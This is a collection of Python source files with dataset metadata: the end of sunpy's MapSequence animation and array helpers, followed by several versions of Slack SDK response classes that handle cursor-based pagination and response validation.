y_range = list(u.Quantity([bl[1], tr[1]]).to(ani_data[i].spatial_units[1]).value)
im.set_extent(np.concatenate((x_range.value, y_range.value)))
if annotate:
annotate_frame(i)
removes += list(plot_function(fig, axes, ani_data[i]))
ani = matplotlib.animation.FuncAnimation(fig, updatefig,
frames=list(range(0, len(ani_data))),
fargs=[im, annotate, ani_data, removes],
interval=interval,
blit=False)
return ani
def peek(self, resample=None, **kwargs):
"""
A animation plotting routine that animates each element in the
MapSequence
Parameters
----------
fig: mpl.figure
Figure to use to create the explorer
resample: list or False
Draws the map at a lower resolution to increase the speed of
animation. Specify a list as a fraction i.e. [0.25, 0.25] to
plot at 1/4 resolution.
[Note: this will only work where the map arrays are the same size]
annotate: bool
Annotate the figure with scale and titles
interval: int
Animation interval in ms
colorbar: bool
Plot colorbar
plot_function : function
A function to call to overplot extra items on the map plot.
For more information see `sunpy.visualization.MapSequenceAnimator`.
Returns
-------
mapsequenceanim : `sunpy.visualization.MapSequenceAnimator`
A mapsequence animator instance.
See Also
--------
sunpy.visualization.mapsequenceanimator.MapSequenceAnimator
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from sunpy.map import Map
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.peek(colorbar=True) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
Plot the map at 1/2 original resolution
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.peek(resample=[0.5, 0.5], colorbar=True) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
Plot the map with the limb at each time step
>>> def myplot(fig, ax, sunpy_map):
... p = sunpy_map.draw_limb()
... return p
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.peek(plot_function=myplot) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
Decide you want an animation:
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.peek(resample=[0.5, 0.5], colorbar=True) # doctest: +SKIP
>>> mplani = ani.get_animation() # doctest: +SKIP
"""
if resample:
if self.all_maps_same_shape():
plot_sequence = MapSequence()
resample = u.Quantity(self.maps[0].dimensions) * np.array(resample)
for amap in self.maps:
plot_sequence.maps.append(amap.resample(resample))
else:
raise ValueError('Maps in mapsequence do not all have the same shape.')
else:
plot_sequence = self
return MapSequenceAnimator(plot_sequence, **kwargs)
def all_maps_same_shape(self):
"""
Tests if all the maps have the same number pixels in the x and y
directions.
"""
return np.all([m.data.shape == self.maps[0].data.shape for m in self.maps])
def at_least_one_map_has_mask(self):
"""
Tests if at least one map has a mask.
"""
return np.any([m.mask is not None for m in self.maps])
def as_array(self):
"""
If all the map shapes are the same, their image data is rendered
into the appropriate numpy object. If none of the maps have masks,
then the data is returned as a (ny, nx, nt) ndarray. If all the maps
have masks, then the data is returned as a (ny, nx, nt) masked array
with all the masks copied from each map. If only some of the maps
have masked then the data is returned as a (ny, nx, nt) masked array,
with masks copied from maps as appropriately; maps that do not have a
mask are supplied with a mask that is full of False entries.
If all the map shapes are not the same, a ValueError is thrown.
"""
if self.all_maps_same_shape():
data = np.swapaxes(np.swapaxes(np.asarray([m.data for m in self.maps]), 0, 1).copy(), 1, 2).copy()
if self.at_least_one_map_has_mask():
mask_sequence = np.zeros_like(data, dtype=bool)
for im, m in enumerate(self.maps):
if m.mask is not None:
mask_sequence[:, :, im] = m.mask
return ma.masked_array(data, mask=mask_sequence)
else:
return data
else:
raise ValueError('Not all maps have the same shape.')
def all_meta(self):
"""
Return all the meta objects as a list.
"""
return [m.meta for m in self.maps]
| {
"repo_name": "dpshelio/sunpy",
"path": "sunpy/map/mapsequence.py",
"copies": "2",
"size": "12537",
"license": "bsd-2-clause",
"hash": 7905458284517244000,
"line_mean": 35.3391304348,
"line_max": 110,
"alpha_frac": 0.5695940018,
"autogenerated": false,
"ratio": 4.090375203915172,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009144790546313384,
"num_lines": 345
} |
"""A Python module for interacting and consuming responses from Slack."""
import asyncio
# Standard Imports
import logging
# Internal Imports
from typing import Union
import slack_sdk.errors as e
class LegacySlackResponse(object): # skipcq: PYL-R0205
"""An iterable container of response data.
Attributes:
data (dict): The json-encoded content of the response. Along
with the headers and status code information.
Methods:
validate: Check if the response from Slack was successful.
get: Retrieves any key from the response data.
next: Retrieves the next portion of results,
if 'next_cursor' is present.
Example:
```python
import os
import slack
client = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])
response1 = client.auth_revoke(test='true')
assert not response1['revoked']
response2 = client.auth_test()
assert response2.get('ok', False)
users = []
for page in client.users_list(limit=2):
TODO: This example should specify when to break.
users = users + page['members']
```
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
object allows you to iterate over the response which
makes subsequent API requests until your code hits
'break' or there are no more results to be found.
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def __init__(
self,
*,
client,
http_verb: str,
api_url: str,
req_args: dict,
data: Union[dict, bytes], # data can be binary data
headers: dict,
status_code: int,
use_sync_aiohttp: bool = True, # True for backward-compatibility
):
self.http_verb = http_verb
self.api_url = api_url
self.req_args = req_args
self.data = data
self.headers = headers
self.status_code = status_code
self._initial_data = data
self._client = client # LegacyWebClient
self._use_sync_aiohttp = use_sync_aiohttp
self._logger = logging.getLogger(__name__)
def __str__(self):
"""Return the Response data if object is converted to a string."""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return f"{self.data}"
def __getitem__(self, key):
"""Retrieves any key from the data store.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response["ok"]
Returns:
The value from data or None.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return self.data.get(key, None)
def __iter__(self):
"""Enables the ability to iterate over the response.
It's required for the iterator protocol.
Note:
This enables Slack cursor-based pagination.
Returns:
(SlackResponse) self
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
self._iteration = 0 # skipcq: PYL-W0201
self.data = self._initial_data
return self
def __next__(self):
"""Retrieves the next portion of results, if 'next_cursor' is present.
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
method allows you to iterate over the response until
your code hits 'break' or there are no more results
to be found.
Returns:
(SlackResponse) self
With the new response data now attached to this object.
Raises:
SlackApiError: If the request to the Slack API failed.
StopIteration: If 'next_cursor' is not present or empty.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
self._iteration += 1
if self._iteration == 1:
return self
if self._next_cursor_is_present(self.data): # skipcq: PYL-R1705
params = self.req_args.get("params", {})
if params is None:
params = {}
params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
self.req_args.update({"params": params})
if self._use_sync_aiohttp:
# We no longer recommend going with this way
response = asyncio.get_event_loop().run_until_complete(
self._client._request( # skipcq: PYL-W0212
http_verb=self.http_verb,
api_url=self.api_url,
req_args=self.req_args,
)
)
else:
# This method sends a request in a synchronous way
response = self._client._request_for_pagination( # skipcq: PYL-W0212
api_url=self.api_url, req_args=self.req_args
)
self.data = response["data"]
self.headers = response["headers"]
self.status_code = response["status_code"]
return self.validate()
else:
raise StopIteration
def get(self, key, default=None):
"""Retrieves any key from the response data.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response.get("ok", False)
Returns:
The value from data or the specified default.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return self.data.get(key, default)
def validate(self):
"""Check if the response from Slack was successful.
Returns:
(SlackResponse)
This method returns it's own object. e.g. 'self'
Raises:
SlackApiError: The request to the Slack API failed.
"""
if self._logger.level <= logging.DEBUG:
body = self.data if isinstance(self.data, dict) else "(binary)"
self._logger.debug(
"Received the following response - "
f"status: {self.status_code}, "
f"headers: {dict(self.headers)}, "
f"body: {body}"
)
if (
self.status_code == 200
and self.data
and (isinstance(self.data, bytes) or self.data.get("ok", False))
):
return self
msg = "The request to the Slack API failed."
raise e.SlackApiError(message=msg, response=self)
@staticmethod
def _next_cursor_is_present(data):
"""Determine if the response contains 'next_cursor'
and 'next_cursor' is not empty.
Returns:
A boolean value.
"""
present = (
"response_metadata" in data
and "next_cursor" in data["response_metadata"]
and data["response_metadata"]["next_cursor"] != ""
)
return present
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack_sdk/web/legacy_slack_response.py",
"copies": "1",
"size": "7903",
"license": "mit",
"hash": 4732599416842040000,
"line_mean": 32.3459915612,
"line_max": 85,
"alpha_frac": 0.5685182842,
"autogenerated": false,
"ratio": 4.549798503166379,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.561831678736638,
"avg_score": null,
"num_lines": null
} |
"""A Python module for interacting and consuming responses from Slack."""
import asyncio
# Standard Imports
import logging
# Internal Imports
import slack_sdk.errors as e
class LegacySlackResponse(object): # skipcq: PYL-R0205
"""An iterable container of response data.
Attributes:
data (dict): The json-encoded content of the response. Along
with the headers and status code information.
Methods:
validate: Check if the response from Slack was successful.
get: Retrieves any key from the response data.
next: Retrieves the next portion of results,
if 'next_cursor' is present.
Example:
```python
import os
import slack
client = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])
response1 = client.auth_revoke(test='true')
assert not response1['revoked']
response2 = client.auth_test()
assert response2.get('ok', False)
users = []
for page in client.users_list(limit=2):
TODO: This example should specify when to break.
users = users + page['members']
```
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
object allows you to iterate over the response which
makes subsequent API requests until your code hits
'break' or there are no more results to be found.
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def __init__(
self,
*,
client,
http_verb: str,
api_url: str,
req_args: dict,
data: dict,
headers: dict,
status_code: int,
use_sync_aiohttp: bool = True, # True for backward-compatibility
):
self.http_verb = http_verb
self.api_url = api_url
self.req_args = req_args
self.data = data
self.headers = headers
self.status_code = status_code
self._initial_data = data
self._client = client # LegacyWebClient
self._use_sync_aiohttp = use_sync_aiohttp
self._logger = logging.getLogger(__name__)
def __str__(self):
"""Return the Response data if object is converted to a string."""
return f"{self.data}"
def __getitem__(self, key):
"""Retrieves any key from the data store.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response["ok"]
Returns:
The value from data or None.
"""
return self.data.get(key, None)
def __iter__(self):
"""Enables the ability to iterate over the response.
It's required for the iterator protocol.
Note:
This enables Slack cursor-based pagination.
Returns:
(SlackResponse) self
"""
self._iteration = 0 # skipcq: PYL-W0201
self.data = self._initial_data
return self
def __next__(self):
"""Retrieves the next portion of results, if 'next_cursor' is present.
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
method allows you to iterate over the response until
your code hits 'break' or there are no more results
to be found.
Returns:
(SlackResponse) self
With the new response data now attached to this object.
Raises:
SlackApiError: If the request to the Slack API failed.
StopIteration: If 'next_cursor' is not present or empty.
"""
self._iteration += 1
if self._iteration == 1:
return self
if self._next_cursor_is_present(self.data): # skipcq: PYL-R1705
params = self.req_args.get("params", {})
if params is None:
params = {}
params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
self.req_args.update({"params": params})
if self._use_sync_aiohttp:
# We no longer recommend going with this way
response = asyncio.get_event_loop().run_until_complete(
self._client._request( # skipcq: PYL-W0212
http_verb=self.http_verb,
api_url=self.api_url,
req_args=self.req_args,
)
)
else:
# This method sends a request in a synchronous way
response = self._client._request_for_pagination( # skipcq: PYL-W0212
api_url=self.api_url, req_args=self.req_args
)
self.data = response["data"]
self.headers = response["headers"]
self.status_code = response["status_code"]
return self.validate()
else:
raise StopIteration
def get(self, key, default=None):
"""Retrieves any key from the response data.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response.get("ok", False)
Returns:
The value from data or the specified default.
"""
return self.data.get(key, default)
def validate(self):
"""Check if the response from Slack was successful.
Returns:
(SlackResponse)
This method returns it's own object. e.g. 'self'
Raises:
SlackApiError: The request to the Slack API failed.
"""
if self._logger.level <= logging.DEBUG:
self._logger.debug(
"Received the following response - "
f"status: {self.status_code}, "
f"headers: {dict(self.headers)}, "
f"body: {self.data}"
)
if self.status_code == 200 and self.data and self.data.get("ok", False):
return self
msg = "The request to the Slack API failed."
raise e.SlackApiError(message=msg, response=self)
@staticmethod
def _next_cursor_is_present(data):
"""Determine if the response contains 'next_cursor'
and 'next_cursor' is not empty.
Returns:
A boolean value.
"""
present = (
"response_metadata" in data
and "next_cursor" in data["response_metadata"]
and data["response_metadata"]["next_cursor"] != ""
)
return present
| {
"repo_name": "slackapi/python-slackclient",
"path": "slack_sdk/web/legacy_slack_response.py",
"copies": "1",
"size": "6833",
"license": "mit",
"hash": -5970731061680909000,
"line_mean": 31.5380952381,
"line_max": 85,
"alpha_frac": 0.5709058978,
"autogenerated": false,
"ratio": 4.4747871643745905,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00017018234224496574,
"num_lines": 210
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
from typing import Union
import slack_sdk.errors as e
from .internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
"""An iterable container of response data.
Attributes:
data (dict): The json-encoded content of the response. Along
with the headers and status code information.
Methods:
validate: Check if the response from Slack was successful.
get: Retrieves any key from the response data.
next: Retrieves the next portion of results,
if 'next_cursor' is present.
Example:
```python
import os
import slack
client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
response1 = await client.auth_revoke(test='true')
assert not response1['revoked']
response2 = await client.auth_test()
assert response2.get('ok', False)
users = []
async for page in await client.users_list(limit=2):
users = users + page['members']
```
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
object allows you to iterate over the response which
makes subsequent API requests until your code hits
'break' or there are no more results to be found.
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def __init__(
self,
*,
client, # AsyncWebClient
http_verb: str,
api_url: str,
req_args: dict,
data: Union[dict, bytes], # data can be binary data
headers: dict,
status_code: int,
):
self.http_verb = http_verb
self.api_url = api_url
self.req_args = req_args
self.data = data
self.headers = headers
self.status_code = status_code
self._initial_data = data
self._iteration = None # for __iter__ & __next__
self._client = client
self._logger = logging.getLogger(__name__)
def __str__(self):
"""Return the Response data if object is converted to a string."""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return f"{self.data}"
def __getitem__(self, key):
"""Retrieves any key from the data store.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response["ok"]
Returns:
The value from data or None.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return self.data.get(key, None)
def __aiter__(self):
"""Enables the ability to iterate over the response.
It's required async-for the iterator protocol.
Note:
This enables Slack cursor-based pagination.
Returns:
(AsyncSlackResponse) self
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
self._iteration = 0
self.data = self._initial_data
return self
async def __anext__(self):
"""Retrieves the next portion of results, if 'next_cursor' is present.
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
method allows you to iterate over the response until
your code hits 'break' or there are no more results
to be found.
Returns:
(AsyncSlackResponse) self
With the new response data now attached to this object.
Raises:
SlackApiError: If the request to the Slack API failed.
StopAsyncIteration: If 'next_cursor' is not present or empty.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
self._iteration += 1
if self._iteration == 1:
return self
if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
params = self.req_args.get("params", {})
if params is None:
params = {}
params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
self.req_args.update({"params": params})
response = await self._client._request( # skipcq: PYL-W0212
http_verb=self.http_verb,
api_url=self.api_url,
req_args=self.req_args,
)
self.data = response["data"]
self.headers = response["headers"]
self.status_code = response["status_code"]
return self.validate()
else:
raise StopAsyncIteration
def get(self, key, default=None):
"""Retrieves any key from the response data.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response.get("ok", False)
Returns:
The value from data or the specified default.
"""
if isinstance(self.data, bytes):
raise ValueError(
"As the response.data is binary data, this operation is unsupported"
)
return self.data.get(key, default)
def validate(self):
"""Check if the response from Slack was successful.
Returns:
(AsyncSlackResponse)
This method returns it's own object. e.g. 'self'
Raises:
SlackApiError: The request to the Slack API failed.
"""
if self._logger.level <= logging.DEBUG:
body = self.data if isinstance(self.data, dict) else "(binary)"
self._logger.debug(
"Received the following response - "
f"status: {self.status_code}, "
f"headers: {dict(self.headers)}, "
f"body: {body}"
)
if (
self.status_code == 200
and self.data
and (isinstance(self.data, bytes) or self.data.get("ok", False))
):
return self
msg = "The request to the Slack API failed."
raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack_sdk/web/async_slack_response.py",
"copies": "1",
"size": "6889",
"license": "mit",
"hash": 3428470462824496000,
"line_mean": 32.2801932367,
"line_max": 84,
"alpha_frac": 0.5770068225,
"autogenerated": false,
"ratio": 4.562251655629139,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00034100596760443307,
"num_lines": 207
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
import slack.errors as e
from slack.web.internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
"""An iterable container of response data.
Attributes:
data (dict): The json-encoded content of the response. Along
with the headers and status code information.
Methods:
validate: Check if the response from Slack was successful.
get: Retrieves any key from the response data.
next: Retrieves the next portion of results,
if 'next_cursor' is present.
Example:
```python
import os
import slack
client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
response1 = await client.auth_revoke(test='true')
assert not response1['revoked']
response2 = await client.auth_test()
assert response2.get('ok', False)
users = []
async for page in await client.users_list(limit=2):
users = users + page['members']
```
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
object allows you to iterate over the response which
makes subsequent API requests until your code hits
'break' or there are no more results to be found.
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def __init__(
self,
*,
client, # AsyncWebClient
http_verb: str,
api_url: str,
req_args: dict,
data: dict,
headers: dict,
status_code: int,
):
self.http_verb = http_verb
self.api_url = api_url
self.req_args = req_args
self.data = data
self.headers = headers
self.status_code = status_code
self._initial_data = data
self._iteration = None # for __iter__ & __next__
self._client = client
self._logger = logging.getLogger(__name__)
def __str__(self):
"""Return the Response data if object is converted to a string."""
return f"{self.data}"
def __getitem__(self, key):
"""Retrieves any key from the data store.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response["ok"]
Returns:
The value from data or None.
"""
return self.data.get(key, None)
def __aiter__(self):
"""Enables the ability to iterate over the response.
It's required async-for the iterator protocol.
Note:
This enables Slack cursor-based pagination.
Returns:
(AsyncSlackResponse) self
"""
self._iteration = 0
self.data = self._initial_data
return self
async def __anext__(self):
"""Retrieves the next portion of results, if 'next_cursor' is present.
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
method allows you to iterate over the response until
your code hits 'break' or there are no more results
to be found.
Returns:
(AsyncSlackResponse) self
With the new response data now attached to this object.
Raises:
SlackApiError: If the request to the Slack API failed.
StopAsyncIteration: If 'next_cursor' is not present or empty.
"""
self._iteration += 1
if self._iteration == 1:
return self
if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
params = self.req_args.get("params", {})
if params is None:
params = {}
params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
self.req_args.update({"params": params})
response = await self._client._request( # skipcq: PYL-W0212
http_verb=self.http_verb,
api_url=self.api_url,
req_args=self.req_args,
)
self.data = response["data"]
self.headers = response["headers"]
self.status_code = response["status_code"]
return self.validate()
else:
raise StopAsyncIteration
def get(self, key, default=None):
"""Retrieves any key from the response data.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response.get("ok", False)
Returns:
The value from data or the specified default.
"""
return self.data.get(key, default)
def validate(self):
"""Check if the response from Slack was successful.
Returns:
(AsyncSlackResponse)
This method returns it's own object. e.g. 'self'
Raises:
SlackApiError: The request to the Slack API failed.
"""
if self._logger.level <= logging.DEBUG:
self._logger.debug(
"Received the following response - "
f"status: {self.status_code}, "
f"headers: {dict(self.headers)}, "
f"body: {self.data}"
)
if self.status_code == 200 and self.data and self.data.get("ok", False):
return self
msg = "The request to the Slack API failed."
raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack/web/async_slack_response.py",
"copies": "1",
"size": "5825",
"license": "mit",
"hash": -4032822841874268000,
"line_mean": 31.182320442,
"line_max": 84,
"alpha_frac": 0.5816309013,
"autogenerated": false,
"ratio": 4.4738863287250386,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00013320654637955038,
"num_lines": 181
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
import slack_sdk.errors as e
from .internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
"""An iterable container of response data.
Attributes:
data (dict): The json-encoded content of the response. Along
with the headers and status code information.
Methods:
validate: Check if the response from Slack was successful.
get: Retrieves any key from the response data.
next: Retrieves the next portion of results,
if 'next_cursor' is present.
Example:
```python
import os
import slack
client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
response1 = await client.auth_revoke(test='true')
assert not response1['revoked']
response2 = await client.auth_test()
assert response2.get('ok', False)
users = []
async for page in await client.users_list(limit=2):
users = users + page['members']
```
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
object allows you to iterate over the response which
makes subsequent API requests until your code hits
'break' or there are no more results to be found.
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def __init__(
self,
*,
client, # AsyncWebClient
http_verb: str,
api_url: str,
req_args: dict,
data: dict,
headers: dict,
status_code: int,
):
self.http_verb = http_verb
self.api_url = api_url
self.req_args = req_args
self.data = data
self.headers = headers
self.status_code = status_code
self._initial_data = data
self._iteration = None # for __iter__ & __next__
self._client = client
self._logger = logging.getLogger(__name__)
def __str__(self):
"""Return the Response data if object is converted to a string."""
return f"{self.data}"
def __getitem__(self, key):
"""Retrieves any key from the data store.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response["ok"]
Returns:
The value from data or None.
"""
return self.data.get(key, None)
def __aiter__(self):
"""Enables the ability to iterate over the response.
It's required async-for the iterator protocol.
Note:
This enables Slack cursor-based pagination.
Returns:
(AsyncSlackResponse) self
"""
self._iteration = 0
self.data = self._initial_data
return self
async def __anext__(self):
"""Retrieves the next portion of results, if 'next_cursor' is present.
Note:
Some responses return collections of information
like channel and user lists. If they do it's likely
that you'll only receive a portion of results. This
method allows you to iterate over the response until
your code hits 'break' or there are no more results
to be found.
Returns:
(AsyncSlackResponse) self
With the new response data now attached to this object.
Raises:
SlackApiError: If the request to the Slack API failed.
StopAsyncIteration: If 'next_cursor' is not present or empty.
"""
self._iteration += 1
if self._iteration == 1:
return self
if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
params = self.req_args.get("params", {})
if params is None:
params = {}
params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
self.req_args.update({"params": params})
response = await self._client._request( # skipcq: PYL-W0212
http_verb=self.http_verb, api_url=self.api_url, req_args=self.req_args,
)
self.data = response["data"]
self.headers = response["headers"]
self.status_code = response["status_code"]
return self.validate()
else:
raise StopAsyncIteration
def get(self, key, default=None):
"""Retrieves any key from the response data.
Note:
This is implemented so users can reference the
SlackResponse object like a dictionary.
e.g. response.get("ok", False)
Returns:
The value from data or the specified default.
"""
return self.data.get(key, default)
def validate(self):
"""Check if the response from Slack was successful.
Returns:
(AsyncSlackResponse)
This method returns it's own object. e.g. 'self'
Raises:
SlackApiError: The request to the Slack API failed.
"""
if self._logger.level <= logging.DEBUG:
self._logger.debug(
"Received the following response - "
f"status: {self.status_code}, "
f"headers: {dict(self.headers)}, "
f"body: {self.data}"
)
if self.status_code == 200 and self.data and self.data.get("ok", False):
return self
msg = "The request to the Slack API failed."
raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackapi/python-slackclient",
"path": "slack_sdk/web/async_slack_response.py",
"copies": "1",
"size": "5788",
"license": "mit",
"hash": -2848151284887559000,
"line_mean": 31.3351955307,
"line_max": 87,
"alpha_frac": 0.5844851417,
"autogenerated": false,
"ratio": 4.455735180908391,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00019817888971136865,
"num_lines": 179
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.